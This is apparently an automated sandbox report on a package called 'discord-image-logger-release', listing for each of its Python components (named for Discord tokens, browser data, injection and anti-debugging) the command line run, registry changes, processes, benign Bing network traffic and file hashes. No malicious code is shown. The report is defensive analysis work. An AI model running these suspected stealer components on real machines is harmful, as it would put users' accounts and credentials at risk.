cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win7-20241010-en

Max time kernel

103s

Max time network

18s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 daf2881f01871a65c86384811445f540
SHA1 8d63b95703974c3f1dff51a17d1951e6b7af85ec
SHA256 cfccab3dc7506e12af9fb90d8a8c4b9d2588f8a7034bfce9ce1624a33d0d05fe
SHA512 047f8e9dc352de41ca1067ee856f436a844c027030a7049621f000b14f88fc94f39dcf02178ddbc0e0f2a3b953bf77b0baf9b24b8dc91efc95fb8acad9af43b7

Analysis: behavioral10

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win10v2004-20250217-en

Max time kernel

91s

Max time network

139s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
GB 2.18.66.162:443 www.bing.com tcp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win10v2004-20250217-en

Max time kernel

95s

Max time network

147s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win10v2004-20250217-en

Max time kernel

93s

Max time network

130s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 e918615c2e1d1c79a8e013ff8da5c56e
SHA1 e849cc16333cbd7d103283e83825bf579e828b19
SHA256 0b1b7500fdd1f624da3ee8725cc65a40da6bc59821772732eaab385ae047b1cf
SHA512 18ba52e292d0ae19ddef2b252be66ca70c94723d8403b95139e0e936a5c1862f951bd11bbe8dacb5b632c53046cac5ec61ac8ee3ad7dbb8351b48cf28c2d9598

Analysis: behavioral4

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win10v2004-20250217-en

Max time kernel

92s

Max time network

126s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win7-20240903-en

Max time kernel

118s

Max time network

120s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 f74c194d4def8f462c94acbef33c4c59
SHA1 2dfd1a97446510a903b2b7c124c5810d254ebe23
SHA256 433b53b1785526d395ea71d8dc3f9ddc2dd42b02f83ac84654f33578594b070b
SHA512 709f8ae2c736780ca6b56f3c63be4a57e7f805edfde94e89231c63c9af3ca3d1dff65b7384759b0059fe429afc1329bcbb52dfa273795ea381d7b7345de4f23a

Analysis: behavioral7

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 58813437e3a009d3154e2bd20d0a8984
SHA1 76993ea836b129d213f9bd88b93b59d61dc46282
SHA256 4c102669a752c90b96ae306de1a010f97b48107a720f3299080fa379faace58b
SHA512 a9d7168070be58cfd96ddb0339d99ee80a47f5f53a53410005bbd7d311be232050ea26246329107eb6b4491981d4ad3d319efec6b33c33f076c54a1e760aae0f